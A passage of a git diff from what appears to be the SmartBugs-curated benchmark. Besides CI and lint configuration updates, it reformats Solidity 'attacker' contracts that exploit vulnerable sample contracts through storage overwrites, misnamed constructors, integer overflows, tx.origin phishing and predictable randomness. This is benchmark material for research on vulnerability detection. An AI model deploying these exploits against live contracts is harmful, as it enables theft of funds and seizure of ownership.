diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index ff6ef79..b39050a 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -9,19 +9,12 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout Repository - uses: actions/checkout@v2 + uses: actions/checkout@v4 - name: Environment - uses: actions/setup-node@v3 - - - name: Cache Node Modules - id: cache-node-modules - uses: actions/cache@v2 - with: - path: 'smartbugs-curated/0.4.x/node_modules' - key: node-modules-${{ hashFiles('**/package-lock.json') }} + uses: actions/setup-node@v4 + - name: Install Dependencies - if: steps.cache-node-modules.outputs.cache-hit != 'true' run: | cd smartbugs-curated/0.4.x npm ci @@ -29,3 +22,18 @@ jobs: run: | cd smartbugs-curated/0.4.x npx hardhat test + lint: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Setup Node.js + uses: actions/setup-node@v4 + + - name: Install dependencies + working-directory: smartbugs-curated/0.4.x + run: npm ci + + - name: Run lint + working-directory: smartbugs-curated/0.4.x + run: npm run lint \ No newline at end of file diff --git a/smartbugs-curated/0.4.x/.solhint.json b/smartbugs-curated/0.4.x/.solhint.json new file mode 100644 index 0000000..aa2821a --- /dev/null +++ b/smartbugs-curated/0.4.x/.solhint.json @@ -0,0 +1,22 @@ +{ + "extends": "solhint:default", + "rules": { + "avoid-tx-origin": "warn", + "const-name-snakecase": "warn", + "contract-name-camelcase": "warn", + "event-name-camelcase": "warn", + "explicit-types": "warn", + "func-name-mixedcase": "warn", + "func-param-name-mixedcase": "warn", + "imports-on-top": "warn", + "modifier-name-mixedcase": "warn", + "no-console": "warn", + "no-global-import": "warn", + "no-unused-vars": "warn", + "quotes": "warn", + "use-forbidden-name": "warn", + "var-name-mixedcase": "warn", + "visibility-modifier-order": "warn" + } + +} diff --git a/smartbugs-curated/0.4.x/.solhintignore b/smartbugs-curated/0.4.x/.solhintignore new file mode 100644 index 0000000..b516519 --- /dev/null +++ b/smartbugs-curated/0.4.x/.solhintignore @@ -0,0 +1 @@ +contracts/dataset \ No newline at end of file diff --git a/smartbugs-curated/0.4.x/contracts/access_control/FibonacciBalance_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/FibonacciBalance_attack.sol index 5271b5f..dde2c26 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/FibonacciBalance_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/FibonacciBalance_attack.sol @@ -1,9 +1,8 @@ pragma solidity ^0.4.22; contract FibonacciBalanceAttacker { - uint storageSlot0; // corresponds to fibonacciLibrary - uint storageSlot1; // corresponds to calculatedFibNumber - + uint256 storageSlot0; // corresponds to fibonacciLibrary + uint256 storageSlot1; // corresponds to calculatedFibNumber // fallback - this will run if a specified function is not found function() public { @@ -15,7 +14,10 @@ contract FibonacciBalanceAttacker { function attack(address victim) public { // we call withdraw to send out ether - bool success = victim.call(bytes4(keccak256("setStart(uint256)")), uint256(address(this))); + bool success = victim.call( + bytes4(keccak256("setStart(uint256)")), + uint256(address(this)) + ); require(success); } - } \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/arbitrary_location_write_simple_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/arbitrary_location_write_simple_attack.sol index 676603e..84ac454 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/arbitrary_location_write_simple_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/arbitrary_location_write_simple_attack.sol @@ -1,22 +1,22 @@ - pragma solidity ^0.4.25; +pragma solidity ^0.4.25; import "../dataset/access_control/arbitrary_location_write_simple.sol"; - contract WalletAttacker { +contract WalletAttacker { Wallet public target; - constructor(address _target) public { - target = Wallet(_target); - } + constructor(address _target) public { + target = Wallet(_target); + } function attack(address new_owner) public { target.PopBonusCode(); uint256 slotIndex = uint256(keccak256(abi.encodePacked(uint256(0)))); - uint256 overwriteIndex = 2**256 -1 - slotIndex + 1 + 1; + uint256 overwriteIndex = 2 ** 256 - 1 - slotIndex + 1 + 1; - target.UpdateBonusCodeAt(overwriteIndex, uint(new_owner)); + target.UpdateBonusCodeAt(overwriteIndex, uint256(new_owner)); } function test() public { target.Destroy(); } - } +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name1_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name1_attack.sol index 491bfeb..0c4ad40 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name1_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name1_attack.sol @@ -1,9 +1,8 @@ - pragma solidity ^0.4.15; +pragma solidity ^0.4.15; - import "../dataset/access_control/incorrect_constructor_name1.sol"; +import "../dataset/access_control/incorrect_constructor_name1.sol"; - contract MissingAttacker{ - +contract MissingAttacker { Missing target; constructor(address _target) public { @@ -11,8 +10,10 @@ } function attack() public { - bytes memory data = abi.encodeWithSelector(bytes4(keccak256("IamMissing()"))); - + bytes memory data = abi.encodeWithSelector( + bytes4(keccak256("IamMissing()")) + ); + (bool success, ) = target.call(data); require(success, "Attack failed"); } @@ -21,7 +22,5 @@ target.withdraw(); } - function () public payable { - } - - } + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name2_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name2_attack.sol index 3d88478..63c520a 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name2_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name2_attack.sol @@ -1,9 +1,8 @@ - pragma solidity ^0.4.15; +pragma solidity ^0.4.15; - import "../dataset/access_control/incorrect_constructor_name2.sol"; +import "../dataset/access_control/incorrect_constructor_name2.sol"; - contract MissingAttacker{ - +contract MissingAttacker { Missing target; constructor(address _target) public { @@ -11,8 +10,10 @@ } function attack() public { - bytes memory data = abi.encodeWithSelector(bytes4(keccak256("missing()"))); - + bytes memory data = abi.encodeWithSelector( + bytes4(keccak256("missing()")) + ); + (bool success, ) = target.call(data); require(success, "Attack failed"); } @@ -21,7 +22,5 @@ target.withdraw(); } - function () public payable { - } - - } + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name3_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name3_attack.sol index 68ce1b9..c3f0949 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name3_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/incorrect_constructor_name3_attack.sol @@ -1,9 +1,8 @@ - pragma solidity ^0.4.15; +pragma solidity ^0.4.15; - import "../dataset/access_control/incorrect_constructor_name3.sol"; +import "../dataset/access_control/incorrect_constructor_name3.sol"; - contract MissingAttacker{ - +contract MissingAttacker { Missing target; constructor(address _target) public { @@ -11,8 +10,10 @@ } function attack() public { - bytes memory data = abi.encodeWithSelector(bytes4(keccak256("Constructor()"))); - + bytes memory data = abi.encodeWithSelector( + bytes4(keccak256("Constructor()")) + ); + (bool success, ) = target.call(data); require(success, "Attack failed"); } @@ -21,7 +22,5 @@ target.withdraw(); } - function () public payable { - } - - } + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/mapping_write_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/mapping_write_attack.sol index b93418e..879f8bc 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/mapping_write_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/mapping_write_attack.sol @@ -1,4 +1,4 @@ - pragma solidity ^0.4.24; +pragma solidity ^0.4.24; import "../dataset/access_control/mapping_write.sol"; @@ -15,15 +15,14 @@ contract MapAttacker { target.set(key, value); uint256 slotIndex = uint256(keccak256(abi.encodePacked(uint256(1)))); - uint256 overwriteIndex = 2**256 -1 - slotIndex + 1; + uint256 overwriteIndex = 2 ** 256 - 1 - slotIndex + 1; - target.set(overwriteIndex, uint(new_owner)); + target.set(overwriteIndex, uint256(new_owner)); } function withdraw_from_victim() public { target.withdraw(); } - function () public payable { - } -} \ No newline at end of file + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/multiowned_vulnerable_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/multiowned_vulnerable_attack.sol index 25de844..44dca97 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/multiowned_vulnerable_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/multiowned_vulnerable_attack.sol @@ -18,4 +18,4 @@ contract TestContractAttacker { } function() public payable {} -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/mycontract_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/mycontract_attack.sol index a5586dc..60191f9 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/mycontract_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/mycontract_attack.sol @@ -3,16 +3,18 @@ pragma solidity ^0.4.24; import "../dataset/access_control/mycontract.sol"; contract MyContractAttacker { - MyContract phishableContract; address attacker; // The attackers address to receive funds. - constructor (MyContract _phishableContract, address _attackerAddress) public { + constructor( + MyContract _phishableContract, + address _attackerAddress + ) public { phishableContract = _phishableContract; attacker = _attackerAddress; } - function () payable public { + function() public payable { phishableContract.sendTo(attacker, 1 ether); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/parity_wallet_bug_2_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/parity_wallet_bug_2_attack.sol index 364c6cd..147a60a 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/parity_wallet_bug_2_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/parity_wallet_bug_2_attack.sol @@ -1,10 +1,8 @@ pragma solidity ^0.4.9; - import "../dataset/access_control/parity_wallet_bug_2.sol"; contract WalletLibraryAttacker { - WalletLibrary target; function WalletLibraryAttacker(address _target) { @@ -17,4 +15,4 @@ contract WalletLibraryAttacker { target.initWallet(_owners, 1, 0); target.kill(address(this)); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/phishable_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/phishable_attack.sol index c0f06c9..bfb9a46 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/phishable_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/phishable_attack.sol @@ -1,18 +1,17 @@ - pragma solidity ^0.4.22; +pragma solidity ^0.4.22; import "../dataset/access_control/phishable.sol"; contract PhishableAttacker { - Phishable phishableContract; address attacker; // The attackers address to receive funds. - constructor (Phishable _phishableContract, address _attackerAddress) public { + constructor(Phishable _phishableContract, address _attackerAddress) public { phishableContract = _phishableContract; attacker = _attackerAddress; } - function () payable public { + function() public payable { phishableContract.withdrawAll(attacker); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/proxy_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/proxy_attack.sol index d996ad5..e23f593 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/proxy_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/proxy_attack.sol @@ -3,7 +3,6 @@ pragma solidity ^0.4.24; import "../dataset/access_control/proxy.sol"; contract ProxyAttacker { - Proxy public target; constructor(Proxy _target) public { @@ -11,17 +10,17 @@ contract ProxyAttacker { } function attack() public { - target.forward(address(this), - abi.encodeWithSignature("call(address)", address(this))); + target.forward( + address(this), + abi.encodeWithSignature("call(address)", address(this)) + ); } function call(address receiver) public { receiver.transfer(address(this).balance); } - function benign() public { - } + function benign() public {} function() public payable {} - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/simple_suicide_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/simple_suicide_attack.sol index 7755531..d541ee8 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/simple_suicide_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/simple_suicide_attack.sol @@ -4,7 +4,7 @@ import "../dataset/access_control/simple_suicide.sol"; contract SimpleSuicideAttacker { SimpleSuicide target; - constructor (address _target) public { + constructor(address _target) public { target = SimpleSuicide(_target); } @@ -12,6 +12,5 @@ contract SimpleSuicideAttacker { target.sudicideAnyone(); } - function () public payable { - } -} \ No newline at end of file + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/unprotected0_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/unprotected0_attack.sol index 19144d1..282f96f 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/unprotected0_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/unprotected0_attack.sol @@ -1,7 +1,6 @@ - pragma solidity ^0.4.15; +pragma solidity ^0.4.15; - contract UnprotectedAttacker{ - +contract UnprotectedAttacker { address target; constructor(address _target) public { @@ -9,9 +8,11 @@ } function attack(address newOwner) public { - bytes memory data = abi.encodeWithSelector(bytes4(keccak256("changeOwner(address)")), newOwner); + bytes memory data = abi.encodeWithSelector( + bytes4(keccak256("changeOwner(address)")), + newOwner + ); (bool success, ) = target.call(data); require(success, "Call failed"); } - - } +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/wallet_02_refund_nosub_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/wallet_02_refund_nosub_attack.sol index 0e04d19..8542d2c 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/wallet_02_refund_nosub_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/wallet_02_refund_nosub_attack.sol @@ -12,11 +12,10 @@ contract WalletAttacker { function attack() public payable { target.deposit.value(msg.value)(); - while (address(target).balance > 0) { target.refund(); } } function() public payable {} -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/wallet_03_wrong_constructor_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/wallet_03_wrong_constructor_attack.sol index 860f4e5..1e7fcda 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/wallet_03_wrong_constructor_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/wallet_03_wrong_constructor_attack.sol @@ -10,8 +10,10 @@ contract WalletAttacker { } function attack() public payable { - bytes memory data = abi.encodeWithSelector(bytes4(keccak256("initWallet()"))); - + bytes memory data = abi.encodeWithSelector( + bytes4(keccak256("initWallet()")) + ); + (bool success, ) = target.call(data); require(success, "Attack failed"); } @@ -21,4 +23,4 @@ contract WalletAttacker { } function() public payable {} -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/access_control/wallet_04_confused_sign_attack.sol b/smartbugs-curated/0.4.x/contracts/access_control/wallet_04_confused_sign_attack.sol index cc996d9..12bb14e 100644 --- a/smartbugs-curated/0.4.x/contracts/access_control/wallet_04_confused_sign_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/access_control/wallet_04_confused_sign_attack.sol @@ -14,4 +14,4 @@ contract WalletAttacker { } function() public payable {} -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/BECToken_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/BECToken_attack.sol index cbff160..87b5aac 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/BECToken_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/BECToken_attack.sol @@ -11,8 +11,7 @@ contract BecTokenAttacker { recipients[0] = address(this); recipients[1] = address(0x0); - uint256 max = 2**255; + uint256 max = 2 ** 255; target.batchTransfer(recipients, max); } - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_1_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_1_attack.sol index ec444ba..c4b387a 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_1_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_1_attack.sol @@ -5,12 +5,12 @@ import "../dataset/arithmetic/integer_overflow_1.sol"; contract OverflowAttacker { Overflow public victim_contract; - constructor (address _overflowAddress) public { + constructor(address _overflowAddress) public { victim_contract = Overflow(_overflowAddress); } function addMax() public { - uint maxUint = 2**256 - 1; + uint256 maxUint = 2 ** 256 - 1; victim_contract.add(maxUint); } diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_add_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_add_attack.sol index e79b5d3..2790b21 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_add_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_add_attack.sol @@ -5,12 +5,12 @@ import "../dataset/arithmetic/integer_overflow_add.sol"; contract IntegerOverflowAddAttacker { IntegerOverflowAdd public victim_contract; - constructor (address _overflowAddress) public { + constructor(address _overflowAddress) public { victim_contract = IntegerOverflowAdd(_overflowAddress); } function attack() public { - uint maxUint = 2**256 - 1; + uint256 maxUint = 2 ** 256 - 1; // Call the add function with a value that will cause an overflow victim_contract.run(maxUint - victim_contract.count()); diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_minimal_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_minimal_attack.sol index 4a35b62..71a45cf 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_minimal_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_minimal_attack.sol @@ -5,14 +5,14 @@ import "../dataset/arithmetic/integer_overflow_minimal.sol"; contract IntegerOverflowMinimalAttacker { IntegerOverflowMinimal victimContract; - constructor (address _victimAddress) public { + constructor(address _victimAddress) public { victimContract = IntegerOverflowMinimal(_victimAddress); } function attack() public { uint256 count = victimContract.count(); - + victimContract.run(count); victimContract.run(1); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_mul_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_mul_attack.sol index a89aaa6..1f5ed7d 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_mul_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_mul_attack.sol @@ -5,12 +5,12 @@ import "../dataset/arithmetic/integer_overflow_mul.sol"; contract IntegerOverflowMulAttacker { IntegerOverflowMul victimContract; - constructor (address _victimAddress) public { + constructor(address _victimAddress) public { victimContract = IntegerOverflowMul(_victimAddress); } function attack() public { - uint256 largeNumber = 2**256 / 2; + uint256 largeNumber = 2 ** 256 / 2; victimContract.run(largeNumber); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol index c481cb2..a969988 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol @@ -5,7 +5,9 @@ import "../dataset/arithmetic/integer_overflow_multitx_multifunc_feasible.sol"; contract IntegerOverflowMultiTxMultiFuncFeasibleAttacker { IntegerOverflowMultiTxMultiFuncFeasible public target; - function IntegerOverflowMultiTxMultiFuncFeasibleAttacker(address _targetAddress) public { + function IntegerOverflowMultiTxMultiFuncFeasibleAttacker( + address _targetAddress + ) public { target = IntegerOverflowMultiTxMultiFuncFeasible(_targetAddress); } @@ -14,4 +16,4 @@ contract IntegerOverflowMultiTxMultiFuncFeasibleAttacker { target.run(2); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol index 1d967ba..40f7505 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol @@ -5,7 +5,9 @@ import "../dataset/arithmetic/integer_overflow_multitx_onefunc_feasible.sol"; contract IntegerOverflowMultiTxOneFuncFeasibleAttacker { IntegerOverflowMultiTxOneFuncFeasible public target; - function IntegerOverflowMultiTxOneFuncFeasibleAttacker(address _targetAddress) public { + function IntegerOverflowMultiTxOneFuncFeasibleAttacker( + address _targetAddress + ) public { target = IntegerOverflowMultiTxOneFuncFeasible(_targetAddress); } @@ -14,4 +16,4 @@ contract IntegerOverflowMultiTxOneFuncFeasibleAttacker { target.run(2); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_simple_add_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_simple_add_attack.sol index 59cffab..ac64d9f 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_simple_add_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_simple_add_attack.sol @@ -2,19 +2,18 @@ pragma solidity 0.4.25; import "../dataset/arithmetic/overflow_simple_add.sol"; -contract Overflow_AddAttacker { +contract OverflowAddAttacker { Overflow_Add victimContract; - constructor (address _victimAddress) public { + constructor(address _victimAddress) public { victimContract = Overflow_Add(_victimAddress); } function attack() public { - uint256 balance = victimContract.balance(); - uint256 max = 2**256 - 1 - balance; - + uint256 max = 2 ** 256 - 1 - balance; + victimContract.add(max); victimContract.add(1); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_single_tx_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_single_tx_attack.sol index eed1f07..cb8c410 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_single_tx_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/overflow_single_tx_attack.sol @@ -5,17 +5,19 @@ import "../dataset/arithmetic/overflow_single_tx.sol"; contract IntegerOverflowSingleTransactionAttacker { IntegerOverflowSingleTransaction public target; - function IntegerOverflowSingleTransactionAttacker(address _targetAddress) public { + function IntegerOverflowSingleTransactionAttacker( + address _targetAddress + ) public { target = IntegerOverflowSingleTransaction(_targetAddress); } function attackOverflowAddToState() public { - uint256 largeNumber = 2**256 - 1; + uint256 largeNumber = 2 ** 256 - 1; target.overflowaddtostate(largeNumber); } function attackOverflowMulToState() public { - uint256 largeNumber = 2**255; + uint256 largeNumber = 2 ** 255; target.overflowmultostate(largeNumber); target.overflowmultostate(2); } @@ -24,4 +26,4 @@ contract IntegerOverflowSingleTransactionAttacker { uint256 number = 2; target.underflowtostate(number); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/timelock_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/timelock_attack.sol index 3f7075b..3b96cdb 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/timelock_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/timelock_attack.sol @@ -1,11 +1,11 @@ - pragma solidity ^0.4.10; +pragma solidity ^0.4.10; - import "../dataset/arithmetic/timelock.sol"; - - contract TimeLockAttacker { +import "../dataset/arithmetic/timelock.sol"; + +contract TimeLockAttacker { TimeLock public target; - constructor (address _targetAddress) public { + constructor(address _targetAddress) public { target = TimeLock(_targetAddress); } @@ -14,11 +14,9 @@ } function attack() public { - uint256 timeLock = target.lockTime(address(this)); - uint256 overflowValue = 2**256 - 1 - timeLock + 1; + uint256 overflowValue = 2 ** 256 - 1 - timeLock + 1; target.increaseLockTime(overflowValue); - } function withdraw() public { @@ -26,4 +24,4 @@ } function() public payable {} - } +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/token_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/token_attack.sol index e4a8ec3..50c2393 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/token_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/token_attack.sol @@ -2,17 +2,16 @@ pragma solidity ^0.4.18; import "../dataset/arithmetic/token.sol"; - contract TokenAttacker { - Token target; +contract TokenAttacker { + Token target; - function TokenAttacker(address _token) public { - target = Token(_token); - } + function TokenAttacker(address _token) public { + target = Token(_token); + } - function attack(address to) public { - uint256 balance = target.balanceOf(address(this)); - uint256 value = balance + 1; - target.transfer(to, value); - } - - } + function attack(address to) public { + uint256 balance = target.balanceOf(address(this)); + uint256 value = balance + 1; + target.transfer(to, value); + } +} diff --git a/smartbugs-curated/0.4.x/contracts/arithmetic/tokensalechallenge_attack.sol b/smartbugs-curated/0.4.x/contracts/arithmetic/tokensalechallenge_attack.sol index c92aabf..511f880 100644 --- a/smartbugs-curated/0.4.x/contracts/arithmetic/tokensalechallenge_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/arithmetic/tokensalechallenge_attack.sol @@ -7,7 +7,7 @@ contract TokenSaleChallengeAttacker { function attack_buy(address _target) public payable { target = TokenSaleChallenge(_target); - uint256 numTokens = 2**238; + uint256 numTokens = 2 ** 238; target.buy.value(msg.value)(numTokens); } @@ -17,5 +17,4 @@ contract TokenSaleChallengeAttacker { } function() public payable {} - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/bad_randomness/blackjack_attack.sol b/smartbugs-curated/0.4.x/contracts/bad_randomness/blackjack_attack.sol index 40b6421..20019fb 100644 --- a/smartbugs-curated/0.4.x/contracts/bad_randomness/blackjack_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/bad_randomness/blackjack_attack.sol @@ -3,7 +3,6 @@ pragma solidity ^0.4.9; import "../dataset/bad_randomness/blackjack.sol"; contract BlackJackAttacker { - BlackJack blackjack; function BlackJackAttacker(address _target) { @@ -12,10 +11,11 @@ contract BlackJackAttacker { // using Deck for *; - function() external payable { - } + function() external payable {} - function _calculateScore(uint8[] memory cards) internal view returns (uint8, uint8) { + function _calculateScore( + uint8[] memory cards + ) internal view returns (uint8, uint8) { uint8 score = 0; uint8 scoreBig = 0; // in case of Ace there could be 2 different scores bool bigAceUsed = false; @@ -34,11 +34,10 @@ contract BlackJackAttacker { } function play() public payable { - uint8[] memory playerCards = new uint8[](2); playerCards[0] = Deck.deal(address(this), 0); playerCards[1] = Deck.deal(address(this), 2); - + (uint8 score, uint8 scoreBig) = _calculateScore(playerCards); if (scoreBig == 21 || score == 21) { @@ -47,5 +46,4 @@ contract BlackJackAttacker { msg.sender.transfer(msg.value); } } - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/bad_randomness/etheraffle_attack.sol b/smartbugs-curated/0.4.x/contracts/bad_randomness/etheraffle_attack.sol index 963ed32..453f6db 100644 --- a/smartbugs-curated/0.4.x/contracts/bad_randomness/etheraffle_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/bad_randomness/etheraffle_attack.sol @@ -1,45 +1,42 @@ pragma solidity ^0.4.16; import "../dataset/bad_randomness/etheraffle.sol"; -contract Ethraffle_v4bAttacker { +contract EthraffleV4bAttacker { Ethraffle_v4b target; - uint constant totalTickets = 50; - mapping (uint => address) contestants; + uint256 constant TOTAL_TICKETS = 50; + mapping(uint256 => address) contestants; - function Ethraffle_v4bAttacker(address _target) public { + function EthraffleV4bAttacker(address _target) public { target = Ethraffle_v4b(_target); } - function setContestant(uint number, address contestant) public { + function setContestant(uint256 number, address contestant) public { contestants[number] = contestant; } function setContestants(address contestant) public { - for (uint i = 0; i < totalTickets - 1; i++) { + for (uint256 i = 0; i < TOTAL_TICKETS - 1; i++) { contestants[i] = contestant; } } - function chooseWinner() public returns (uint) { - - - address seed1 = contestants[uint(block.coinbase) % totalTickets]; - address seed2 = contestants[uint(address(this)) % totalTickets]; - uint seed3 = block.difficulty; + function chooseWinner() public returns (uint256) { + address seed1 = contestants[uint256(block.coinbase) % TOTAL_TICKETS]; + address seed2 = contestants[uint256(address(this)) % TOTAL_TICKETS]; + uint256 seed3 = block.difficulty; bytes32 randHash = keccak256(seed1, seed2, seed3); - uint winningNumber = uint(randHash) % totalTickets; + uint256 winningNumber = uint256(randHash) % TOTAL_TICKETS; return winningNumber; } function attack() public payable returns (bool) { - uint winningNumber = chooseWinner(); - if (winningNumber == totalTickets - 1) { + uint256 winningNumber = chooseWinner(); + if (winningNumber == TOTAL_TICKETS - 1) { target.buyTickets.value(0.0506 ether)(); return true; } return false; } - function() public payable { - } -} \ No newline at end of file + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/bad_randomness/guess_the_random_number_attack.sol b/smartbugs-curated/0.4.x/contracts/bad_randomness/guess_the_random_number_attack.sol index 54d345f..7d14365 100644 --- a/smartbugs-curated/0.4.x/contracts/bad_randomness/guess_the_random_number_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/bad_randomness/guess_the_random_number_attack.sol @@ -3,19 +3,23 @@ pragma solidity ^0.4.21; import "../dataset/bad_randomness/guess_the_random_number.sol"; contract GuessTheRandomNumberChallengeAttacker { - GuessTheRandomNumberChallenge target; - function GuessTheRandomNumberChallengeAttacker(address _target) public payable { + function GuessTheRandomNumberChallengeAttacker( + address _target + ) public payable { target = GuessTheRandomNumberChallenge(_target); } - function attack(uint block_number, uint256 block_timestamp) public payable { - uint8 answer = uint8(keccak256(block.blockhash(block_number-1), block_timestamp)); + function attack( + uint256 block_number, + uint256 block_timestamp + ) public payable { + uint8 answer = uint8( + keccak256(block.blockhash(block_number - 1), block_timestamp) + ); target.guess.value(1 ether)(answer); } - function() public payable { - } - -} \ No newline at end of file + function() public payable {} +} diff --git 